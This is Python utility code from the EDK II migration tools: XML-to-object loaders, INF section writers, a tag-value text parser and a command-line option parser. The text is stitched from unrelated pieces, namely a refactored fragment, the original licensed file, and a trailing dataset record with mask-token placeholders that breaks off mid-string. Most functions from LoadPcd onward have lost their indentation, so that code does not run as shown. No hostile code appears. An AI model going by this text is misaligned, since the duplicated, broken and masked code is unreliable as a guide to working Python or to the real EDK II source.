    """Write the standard EDK II '#/** @file' comment header to TextFile."""
    # Description and License may span multiple lines; re-prefix each line
    # with the '# ' comment lead so the whole header stays a comment block.
    Description = CommonHeader.Description.strip().replace('\n', '\n# ')
    License = CommonHeader.License.replace('\n', '\n# ').replace('  ', ' ')
    Header = (
        '#/** @file\n#\n'
        '# ' + CommonHeader.Abstract + '\n#\n'
        '# ' + Description + '\n'
        '# ' + CommonHeader.Copyright + '\n#\n'
        '# ' + License +
        '\n#\n#**/\n\n'
    )
    StoreTextFile(TextFile, Header)
def StoreDefinesSection(TextFile, DefinesTupleList):
    """Write a [Defines] section built from (name, value) tuples to TextFile."""
    Lines = ['[Defines]\n']
    # Each tuple renders as a left-aligned "name = value" line.
    for DefineItem in DefinesTupleList:
        Lines.append('  %-30s = %s\n' % DefineItem)
    Lines.append('\n\n')
    StoreTextFile(TextFile, ''.join(Lines))
def GetUserExtensions(UserExtensions):
    """Render a UserExtensionsClass object as a [UserExtensions.*.*] section."""
    return '[UserExtensions.%s.%s]\n  %s\n\n' % (
        UserExtensions.UserID, UserExtensions.Identifier, UserExtensions.Content)
# Matches a "name = value" assignment line; value may be empty.
mReEquation = re.compile(r'\s*(\S+)\s*=\s*(\S*)\s*')
def GetTextFileInfo(FileName, TagTuple):
    """Scan a text file for "tag = value" lines matching TagTuple.

    TagTuple holds upper-case tag names; the returned list has one entry per
    tag (same order), '' when the tag was not found.  '#' starts a comment.

    Fixes over the original: the file handle is now closed (it was leaked),
    and only I/O errors are caught — the original bare "except:" also
    swallowed programming errors inside the parsing loop.
    """
    ValueTuple = [''] * len(TagTuple)
    try:
        TextFile = open(FileName)
        try:
            for Line in TextFile:
                Line = Line.split('#', 1)[0]
                MatchEquation = mReEquation.match(Line)
                if MatchEquation:
                    Tag = MatchEquation.group(1).upper()
                    Value = MatchEquation.group(2)
                    for Index in range(len(TagTuple)):
                        if TagTuple[Index] == Tag:
                            ValueTuple[Index] = Value
        finally:
            TextFile.close()
    except EnvironmentError:
        EdkLogger.info('IO Error in reading file %s' % FileName)
    return ValueTuple
def GetXmlFileInfo(FileName, TagTuple):
    """Return a tuple of element values, one for each XML tag in TagTuple."""
    XmlDom = XmlParseFile(FileName)
    Values = [XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple]
    return tuple(Values)
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):
    """Parse the command line shared by the EDK migration tools.

    Source/Destinate are file-type names (e.g. 'MSA', 'INF') used in help
    text and to derive the output file name under -a; ToolName/VersionNumber
    feed the --version banner.  Returns (Options, InputFile).
    Raises MigrationError for a missing input file or bad option combination.
    """
    UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName
    Version = '%s Version %.2f' % (ToolName, VersionNumber)
    Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'
    Parser = OptionParser(description=Copyright, version=Version, usage=
        UsageString)
    Parser.add_option('-o', '--output', dest='OutputFile', help=
        'The name of the %s file to be created.' % Destinate)
    Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',
        default=False, help=
        'Automatically create the %s file using the name of the %s file and replacing file extension'
         % (Source, Destinate))
    Parser.add_option('-q', '--quiet', action='store_true', type=None, help
        ='Disable all messages except FATAL ERRORS.')
    Parser.add_option('-v', '--verbose', action='store_true', type=None,
        help='Turn on verbose output with informational messages printed.')
    Options, Args = Parser.parse_args()
    # Logging level: -v wins over -q when both are supplied.
    if Options.verbose:
        EdkLogger.setLevel(EdkLogger.VERBOSE)
    elif Options.quiet:
        EdkLogger.setLevel(EdkLogger.QUIET)
    else:
        EdkLogger.setLevel(EdkLogger.INFO)
    # Exactly one positional input file is required and must exist.
    if len(Args) == 0:
        raise MigrationError(PARAMETER_MISSING, name='Input file', usage=
            Parser.get_usage())
    if len(Args) > 1:
        raise MigrationError(PARAMETER_INVALID, name='Too many input files',
            usage=Parser.get_usage())
    InputFile = Args[0]
    if not os.path.exists(InputFile):
        raise MigrationError(FILE_NOT_FOUND, name=InputFile)
    # -o and -a conflict; with -a the output name is the input name with the
    # extension swapped for the destination type; one of them is mandatory.
    if Options.OutputFile:
        if Options.AutoWrite:
            raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',
                usage=Parser.get_usage())
    elif Options.AutoWrite:
        Options.OutputFile = os.path.splitext(InputFile)[0
            ] + '.' + Destinate.lower()
    else:
        raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.
            get_usage())
    return Options, InputFile
# Library module of shared migration helpers: nothing to run standalone.
if __name__ == '__main__':
    pass
<|reserved_special_token_1|>
## @file
# Contains several utilitities shared by migration tools.
#
# Copyright (c) 2007 - 2014, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import EdkLogger
from optparse import OptionParser
from Common.BuildToolError import *
from XmlRoutines import *
from CommonDataClass.CommonClass import *
from Common.LongFilePathSupport import OpenLongFilePath as open
## Set all fields of CommonClass object.
#
# Set all attributes of CommonClass object from XML Dom object of XmlCommon.
#
# @param Common The destine CommonClass object.
# @param XmlCommon The source XML Dom object.
#
def SetCommon(Common, XmlCommon):
    """Set Usage/FeatureFlag/SupArchList/HelpText of Common from XmlCommon."""
    XmlTag = "Usage"
    Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()
    XmlTag = "FeatureFlag"
    Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)
    XmlTag = "SupArchList"
    Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()
    # HelpText is a child element named after the node's own tag.
    XmlTag = XmlNodeName(XmlCommon) + "/" + "HelpText"
    Common.HelpText = XmlElement(XmlCommon, XmlTag)
## Set some fields of CommonHeaderClass object.
#
# Set Name, Guid, FileName and FullPath fields of CommonHeaderClass object from
# XML Dom object of XmlCommonHeader, NameTag and FileName.
#
# @param  CommonHeader       The destine CommonClass object.
# @param  XmlCommonHeader    The source XML Dom object.
# @param  NameTag            The name tag in XML Dom object.
# @param  FileName           The file name of the XML file.
#
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
    """Set Name/Guid/Version and file-path fields of CommonHeader."""
    XmlParentTag = XmlNodeName(XmlCommonHeader)
    XmlTag = XmlParentTag + "/" + NameTag
    CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParentTag + "/" + "GuidValue"
    CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParentTag + "/" + "Version"
    CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)
    CommonHeader.FileName = os.path.basename(FileName)
    CommonHeader.FullPath = os.path.abspath(FileName)
## Regular expression to match specification and value.
mReSpecification = re.compile(r"(?P<Specification>\w+)\s+(?P<Value>\w*)")
## Add specification to specification dictionary.
#
# Abstract specification name, value pair from Specification String and add them
# to specification dictionary.
#
# @param SpecificationDict The destine Specification dictionary.
# @param SpecificationString The source Specification String from which the
# specification name and value pair is abstracted.
#
def AddToSpecificationDict(SpecificationDict, SpecificationString):
    """Abstract specification name, value pair from Specification String"""
    # Each "<name> <value>" pair found by mReSpecification becomes a dict entry.
    for SpecificationMatch in mReSpecification.finditer(SpecificationString):
        Specification = SpecificationMatch.group("Specification")
        Value = SpecificationMatch.group("Value")
        SpecificationDict[Specification] = Value
## Set all fields of CommonHeaderClass object.
#
# Set all attributes of CommonHeaderClass object from XML Dom object of
# XmlCommonHeader, NameTag and FileName.
#
# @param  CommonHeader       The destine CommonClass object.
# @param  XmlCommonHeader    The source XML Dom object.
# @param  NameTag            The name tag in XML Dom object.
# @param  FileName           The file name of the XML file.
#
def SetCommonHeader(CommonHeader, XmlCommonHeader):
    """Set all attributes of CommonHeaderClass object from XmlCommonHeader"""
    XmlParent = XmlNodeName(XmlCommonHeader)
    XmlTag = XmlParent + "/" + "Abstract"
    CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParent + "/" + "Description"
    CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParent + "/" + "Copyright"
    CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParent + "/" + "License"
    CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)
    # Specification is a "<name> <value>" list folded into a dictionary.
    XmlTag = XmlParent + "/" + "Specification"
    Specification = XmlElement(XmlCommonHeader, XmlTag)
    AddToSpecificationDict(CommonHeader.Specification, Specification)
    XmlTag = XmlParent + "/" + "ModuleType"
    CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)
## Load a new Cloned Record class object.
#
# Read an input XML ClonedRecord DOM object and return an object of Cloned Record
# contained in the DOM object.
#
# @param XmlCloned A child XML DOM object in a Common XML DOM.
#
# @retvel ClonedRecord A new Cloned Record object created by XmlCloned.
#
def LoadClonedRecord(XmlCloned):
    """Build a ClonedRecordClass object from an XML <Cloned> DOM node."""
    ClonedRecord = ClonedRecordClass()
    XmlTag = "Id"
    ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))
    XmlTag = "FarGuid"
    ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)
    XmlTag = "Cloned/PackageGuid"
    ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)
    XmlTag = "Cloned/PackageVersion"
    ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)
    XmlTag = "Cloned/ModuleGuid"
    ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)
    XmlTag = "Cloned/ModuleVersion"
    ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)
    return ClonedRecord
## Load a new Guid/Protocol/Ppi common class object.
#
# Read an input XML Guid/Protocol/Ppi DOM object and return an object of
# Guid/Protocol/Ppi contained in the DOM object.
#
# @param  XmlGuidProtocolPpiCommon A child XML DOM object in a Common XML DOM.
#
# @retvel GuidProtocolPpiCommon A new GuidProtocolPpiCommon class object
#         created by XmlGuidProtocolPpiCommon.
#
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
    """Build a GuidProtocolPpiCommonClass object from a Guid/Protocol/Ppi node."""
    GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()
    XmlTag = "Name"
    GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
    XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)
    # The C-name child element is spelled differently per parent node type.
    if XmlParent == "Entry":
        XmlTag = "%s/C_Name" % XmlParent
    elif XmlParent == "GuidCNames":
        XmlTag = "%s/GuidCName" % XmlParent
    else:
        XmlTag = "%s/%sCName" % (XmlParent, XmlParent)
    GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
    XmlTag = XmlParent + "/" + "GuidValue"
    GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
    # A "...Notify" parent marks this record as a notification registration.
    if XmlParent.endswith("Notify"):
        GuidProtocolPpiCommon.Notify = True
    XmlTag = "GuidTypeList"
    GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
    GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()
    XmlTag = "SupModuleList"
    SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
    GuidProtocolPpiCommon.SupModuleList = SupModules.split()
    SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)
    return GuidProtocolPpiCommon
## Load a new Pcd class object.
#
# Read an input XML Pcd DOM object and return an object of Pcd
# contained in the DOM object.
#
# @param XmlPcd A child XML DOM object in a Common XML DOM.
#
# @retvel Pcd A new Pcd object created by XmlPcd.
#
def LoadPcd(XmlPcd):
"""Return a new PcdClass object equivalent to XmlPcd"""
Pcd = PcdClass()
XmlTag = "PcdEntry/C_Name"
Pcd.CName = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/Token"
Pcd.Token = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/TokenSpaceGuidCName"
Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/DatumType"
Pcd.DatumType = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/MaxDatumSize"
Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/DefaultValue"
Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdItemType"
Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)
XmlTag = "PcdEntry/ValidUsage"
Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()
XmlTag = "SupModuleList"
Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()
SetCommon(Pcd, XmlPcd)
return Pcd
## Load a new LibraryClass class object.
#
# Read an input XML LibraryClass DOM object and return an object of LibraryClass
# contained in the DOM object.
#
# @param XmlLibraryClass A child XML DOM object in a Common XML DOM.
#
# @retvel LibraryClass A new LibraryClass object created by XmlLibraryClass.
#
def LoadLibraryClass(XmlLibraryClass):
    """Create a LibraryClassClass object from an XML LibraryClass DOM node.

    @param XmlLibraryClass  A child XML DOM object in a Common XML DOM.

    @retval LibraryClass    A new LibraryClassClass object populated from
                            XmlLibraryClass.
    """
    LibraryClass = LibraryClassClass()
    # Prefer the <Keyword> child element; fall back to the "Name" attribute
    # when the element is absent or empty.
    LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, "LibraryClass/Keyword")
    if LibraryClass.LibraryClass == "":
        LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, "Name")
    LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, "LibraryClass/IncludeHeader")
    LibraryClass.RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, "RecommendedInstanceVersion")
    LibraryClass.RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, "RecommendedInstanceGuid")
    # Supported module types are space-separated in the attribute value.
    LibraryClass.SupModuleList = XmlAttribute(XmlLibraryClass, "SupModuleList").split()
    SetCommon(LibraryClass, XmlLibraryClass)
    return LibraryClass
## Load a new Build Option class object.
#
# Read an input XML BuildOption DOM object and return an object of Build Option
# contained in the DOM object.
#
# @param XmlBuildOption A child XML DOM object in a Common XML DOM.
#
# @retvel BuildOption A new Build Option object created by XmlBuildOption.
#
def LoadBuildOption(XmlBuildOption):
    """Return a new BuildOptionClass object equivalent to XmlBuildOption.

    The option text is the element's own character data; all other fields
    are read from attributes of the BuildOption element.
    """
    BuildOption = BuildOptionClass()
    BuildOption.Option = XmlElementData(XmlBuildOption)
    BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, "BuildTargets").split()
    BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, "ToolChainFamily")
    BuildOption.TagName = XmlAttribute(XmlBuildOption, "TagName")
    BuildOption.ToolCode = XmlAttribute(XmlBuildOption, "ToolCode")
    BuildOption.SupArchList = XmlAttribute(XmlBuildOption, "SupArchList").split()
    return BuildOption
## Load a new User Extensions class object.
#
# Read an input XML UserExtensions DOM object and return an object of User
# Extensions contained in the DOM object.
#
# @param XmlUserExtensions A child XML DOM object in a Common XML DOM.
#
# @retvel UserExtensions A new User Extensions object created by
# XmlUserExtensions.
#
def LoadUserExtensions(XmlUserExtensions):
    """Create a UserExtensionsClass object from an XML UserExtensions node.

    UserID and Identifier come from attributes; Content is the element's
    character data.
    """
    UserExtensions = UserExtensionsClass()
    UserExtensions.UserID = XmlAttribute(XmlUserExtensions, "UserID")
    UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, "Identifier")
    UserExtensions.Content = XmlElementData(XmlUserExtensions)
    return UserExtensions
## Store content to a text file object.
#
# Write some text file content to a text file object. The contents may echo
# in screen in a verbose way.
#
# @param TextFile The text file object.
# @param Content The string object to be written to a text file.
#
def StoreTextFile(TextFile, Content):
    """Write Content to TextFile, echoing it at verbose log level first.

    @param TextFile  An open, writable file object.
    @param Content   The string to append to the file.
    """
    EdkLogger.verbose(Content)
    TextFile.write(Content)
## Add item to a section.
#
# Add an Item with specific CPU architecture to section dictionary.
# The possible duplication is ensured to be removed.
#
# @param Section Section dictionary indexed by CPU architecture.
# @param Arch CPU architecture: Ia32, X64, Ipf, ARM, AARCH64, Ebc or Common.
# @param Item The Item to be added to section dictionary.
#
def AddToSection(Section, Arch, Item):
SectionArch = Section.get(Arch, [])
if Item not in SectionArch:
SectionArch.append(Item)
Section[Arch] = SectionArch
## Get section contents.
#
# Return the content of section named SectionName.
# the contents is based on Methods and ObjectLists.
#
# @param SectionName The name of the section.
# @param Method A function returning a string item of an object.
# @param ObjectList The list of object.
#
# @retval Section The string content of a section.
#
def GetSection(SectionName, Method, ObjectList):
SupportedArches = ["common", "Ia32", "X64", "Ipf", "Ebc", "ARM", "AARCH64"]
SectionDict = {}
for Object in ObjectList:
Item = Method(Object)
if Item == "":
continue
Item = " %s" % Item
Arches = Object.SupArchList
if len(Arches) == 0:
AddToSection(SectionDict, "common", Item)
else:
for Arch in SupportedArches:
if Arch.upper() in Arches:
AddToSection(SectionDict, Arch, Item)
Section = ""
for Arch in SupportedArches:
SectionArch = "\n".join(SectionDict.get(Arch, []))
if SectionArch != "":
Section += "[%s.%s]\n%s\n" % (SectionName, Arch, SectionArch)
Section += "\n"
if Section != "":
Section += "\n"
return Section
## Store file header to a text file.
#
# Write standard file header to a text file. The content includes copyright,
# abstract, description and license extracted from CommonHeader class object.
#
# @param TextFile The text file object.
# @param CommonHeader The source CommonHeader class object.
#
def StoreHeader(TextFile, CommonHeader):
CopyRight = CommonHeader.Copyright
Abstract = CommonHeader.Abstract
Description = CommonHeader.Description
License = CommonHeader.License
Header = "#/** @file\n#\n"
Header += "# " + Abstract + "\n#\n"
Header += "# " + Description.strip().replace("\n", "\n# ") + "\n"
Header += "# " + CopyRight + "\n#\n"
Header += "# " + License.replace("\n", "\n# ").replace(" ", " ")
Header += "\n#\n#**/\n\n"
StoreTextFile(TextFile, Header)
## Store file header to a text file.
#
# Write Defines section to a text file. DefinesTupleList determines the content.
#
# @param TextFile The text file object.
# @param DefinesTupleList The list of (Tag, Value) to be added as one item.
#
def StoreDefinesSection(TextFile, DefinesTupleList):
Section = "[Defines]\n"
for DefineItem in DefinesTupleList:
Section += " %-30s = %s\n" % DefineItem
Section += "\n\n"
StoreTextFile(TextFile, Section)
## Return one User Extension section.
#
# Read the input UserExtentsions class object and return one section.
#
# @param UserExtensions An input UserExtensions class object.
#
# @retval UserExtensionSection A section representing UserExtensions object.
#
def GetUserExtensions(UserExtensions):
UserId = UserExtensions.UserID
Identifier = UserExtensions.Identifier
Content = UserExtensions.Content
return "[UserExtensions.%s.%s]\n %s\n\n" % (UserId, Identifier, Content)
## Regular expression to match an equation.
mReEquation = re.compile(r"\s*(\S+)\s*=\s*(\S*)\s*")
## Return a value tuple matching information in a text fle.
#
# Parse the text file and return a value tuple corresponding to an input tag
# tuple. In case of any error, an tuple of empty strings is returned.
#
# @param FileName The file name of the text file.
# @param TagTuple A tuple of tags as the key to the value.
#
# @param ValueTupe The returned tuple corresponding to the tag tuple.
#
def GetTextFileInfo(FileName, TagTuple):
ValueTuple = [""] * len(TagTuple)
try:
for Line in open(FileName):
Line = Line.split("#", 1)[0]
MatchEquation = mReEquation.match(Line)
if MatchEquation:
Tag = MatchEquation.group(1).upper()
Value = MatchEquation.group(2)
for Index in range(len(TagTuple)):
if TagTuple[Index] == Tag:
ValueTuple[Index] = Value
except:
EdkLogger.info("IO Error in reading file %s" % FileName)
return ValueTuple
## Return a value tuple matching information in an XML fle.
#
# Parse the XML file and return a value tuple corresponding to an input tag
# tuple. In case of any error, an tuple of empty strings is returned.
#
# @param FileName The file name of the XML file.
# @param TagTuple A tuple of tags as the key to the value.
#
# @param ValueTupe The returned tuple corresponding to the tag tuple.
#
def GetXmlFileInfo(FileName, TagTuple):
XmlDom = XmlParseFile(FileName)
return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])
## Parse migration command line options
#
# Use standard Python module optparse to parse command line option of this tool.
#
# @param Source The source file type.
# @param Destinate The destinate file type.
#
# @retval Options A optparse object containing the parsed options.
# @retval InputFile Path of an source file to be migrated.
#
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber = 1.0):
# use clearer usage to override default usage message
UsageString = "%s [-a] [-v|-q] [-o <output_file>] <input_file>" % ToolName
Version = "%s Version %.2f" % (ToolName, VersionNumber)
Copyright = "Copyright (c) 2007, Intel Corporation. All rights reserved."
Parser = OptionParser(description=Copyright, version=Version, usage=UsageString)
Parser.add_option("-o", "--output", dest="OutputFile", help="The name of the %s file to be created." % Destinate)
Parser.add_option("-a", "--auto", dest="AutoWrite", action="store_true", default=False, help="Automatically create the %s file using the name of the %s file and replacing file extension" % (Source, Destinate))
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed.")
Options, Args = Parser.parse_args()
# Set logging level
if Options.verbose:
EdkLogger.setLevel(EdkLogger.VERBOSE)
elif Options.quiet:
EdkLogger.setLevel(EdkLogger.QUIET)
else:
EdkLogger.setLevel(EdkLogger.INFO)
# error check
if len(Args) == 0:
raise MigrationError(PARAMETER_MISSING, name="Input file", usage=Parser.get_usage())
if len(Args) > 1:
raise MigrationError(PARAMETER_INVALID, name="Too many input files", usage=Parser.get_usage())
InputFile = Args[0]
if not os.path.exists(InputFile):
raise MigrationError(FILE_NOT_FOUND, name=InputFile)
if Options.OutputFile:
if Options.AutoWrite:
raise MigrationError(OPTION_CONFLICT, arg1="-o", arg2="-a", usage=Parser.get_usage())
else:
if Options.AutoWrite:
Options.OutputFile = os.path.splitext(InputFile)[0] + "." + Destinate.lower()
else:
raise MigrationError(OPTION_MISSING, name="-o", usage=Parser.get_usage())
return Options, InputFile
# This acts like the main() function for the script, unless it is 'import'ed
# into another script.
# This module is a helper library; there is nothing to do when it is run
# directly as a script.
if __name__ == '__main__':
    pass
|
flexible
|
{
"blob_id": "2dbb1051b35898288db629fd0c5b3887c429e9b8",
"index": 1313,
"step-1": "<mask token>\n\n\ndef SetCommon(Common, XmlCommon):\n XmlTag = 'Usage'\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = 'FeatureFlag'\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n XmlTag = 'SupArchList'\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n XmlParentTag = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParentTag + '/' + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'GuidValue'\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'Version'\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\n<mask token>\n\n\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group('Specification')\n Value = SpecificationMatch.group('Value')\n SpecificationDict[Specification] = Value\n\n\n<mask token>\n\n\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = ClonedRecordClass()\n XmlTag = 'Id'\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n XmlTag = 'FarGuid'\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageGuid'\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageVersion'\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleGuid'\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleVersion'\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n return ClonedRecord\n\n\ndef 
LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n XmlTag = 'Name'\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == 'Entry':\n XmlTag = '%s/C_Name' % XmlParent\n elif XmlParent == 'GuidCNames':\n XmlTag = '%s/GuidCName' % XmlParent\n else:\n XmlTag = '%s/%sCName' % (XmlParent, XmlParent)\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n XmlTag = XmlParent + '/' + 'GuidValue'\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n if XmlParent.endswith('Notify'):\n GuidProtocolPpiCommon.Notify = True\n XmlTag = 'GuidTypeList'\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n return GuidProtocolPpiCommon\n\n\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n XmlTag = 'PcdEntry/C_Name'\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/Token'\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/TokenSpaceGuidCName'\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DatumType'\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/MaxDatumSize'\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DefaultValue'\n Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdItemType'\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/ValidUsage'\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n XmlTag = 'SupModuleList'\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n SetCommon(Pcd, XmlPcd)\n return Pcd\n\n\n<mask token>\n\n\ndef 
StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\n<mask token>\n\n\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = UserExtensions.Content\n return '[UserExtensions.%s.%s]\\n %s\\n\\n' % (UserId, Identifier, Content)\n\n\n<mask token>\n\n\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):\n UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName\n Version = '%s Version %.2f' % (ToolName, VersionNumber)\n Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'\n Parser = OptionParser(description=Copyright, version=Version, usage=\n UsageString)\n Parser.add_option('-o', '--output', dest='OutputFile', help=\n 'The name of the %s file to be created.' 
% Destinate)\n Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',\n default=False, help=\n 'Automatically create the %s file using the name of the %s file and replacing file extension'\n % (Source, Destinate))\n Parser.add_option('-q', '--quiet', action='store_true', type=None, help\n ='Disable all messages except FATAL ERRORS.')\n Parser.add_option('-v', '--verbose', action='store_true', type=None,\n help='Turn on verbose output with informational messages printed.')\n Options, Args = Parser.parse_args()\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name='Input file', usage=\n Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name='Too many input files',\n usage=Parser.get_usage())\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',\n usage=Parser.get_usage())\n elif Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0\n ] + '.' + Destinate.lower()\n else:\n raise 